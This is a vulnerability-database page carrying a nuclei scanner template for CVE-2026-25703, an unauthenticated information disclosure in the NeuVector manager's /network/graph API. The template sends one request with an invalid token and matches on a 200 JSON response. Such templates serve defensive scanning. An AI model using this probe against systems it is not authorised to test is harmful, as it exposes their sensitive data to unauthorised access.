Lucene search
+L

NeuVector - Information Disclosure

🗓️ 25 Sep 2026 02:05:06Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 7 Views

Unauthenticated remote information disclosure in neuvector-manager via cached API data.

Related
Refs
Code
ReporterTitlePublishedViews
Family
attackerkb
attackerkb
CVE-2026-25703
5 Aug 202609:48
–attackerkb
circl
Circl
CVE-2026-25703
5 Aug 202610:42
–circl
cve
CVE
CVE-2026-25703
5 Aug 202609:48
–cve
cvelist
Cvelist
CVE-2026-25703 Potential information leakage from manager /network/graph API in NeuVector
5 Aug 202609:48
–cvelist
euvd
EUVD
EUVD-2026-53297
5 Aug 202609:48
–euvd
nvd
NVD
CVE-2026-25703
5 Aug 202610:17
–nvd
rapid7
Rapid7 Vulnerability Database (full)
CVE-2026-25703: Missing Authentication for Critical Function
5 Aug 202600:00
–rapid7
susecve
SUSE CVE
SUSE CVE-2026-25703
31 Jul 202600:21
–susecve
id: CVE-2026-25703

info:
  name: NeuVector - Information Disclosure
  author: str4k3r
  severity: high
  description: |
    NeuVector through 5.4.9 contains an information disclosure vulnerability caused by missing authentication and cached sensitive data in the manager /network/graph API, letting remote attackers access sensitive information, exploit requires no special privileges.
  impact: |
    Remote attackers can access sensitive information from the manager API, potentially exposing confidential data.
  remediation: |
    Update to the latest version beyond 5.4.9.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2026-25703
    - https://github.com/neuvector/manager/security/advisories/GHSA-hx45-873x-74qv
    - https://github.com/neuvector/manager/commit/949cc1184fdf671416f788d9d2a039f8558a717d
    - https://github.com/neuvector/manager/releases/tag/v5.5.0
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 7.3
    cve-id: CVE-2026-25703
    epss-score: 0.00392
    epss-percentile: 0.30589
    cwe-id: CWE-202
  metadata:
    verified: true
    max-request: 1
    vendor: suse
    product: neuvector-manager
  tags: cve,cve2026,neuvector,suse,manager,auth-bypass,disclosure

variables:
  marker: '{{randstr}}'

http:
  - raw:
      - |
        GET /network/graph/layout?user={{marker}} HTTP/1.1
        Host: {{Hostname}}
        Token: invalid

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: header
        words:
          - "application/json"

      - type: word
        part: body
        words:
          - '"user":"{{marker}}"'
# digest: 4b0a00483046022100d8d303cf6c9c09e74879f153cc219287df6a8a39dcb25f66b516259ff0e7b516022100f131fbaeed96503b1f991e7eb64f56b00f5efd2479b33a3f6981432aa712ef55:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation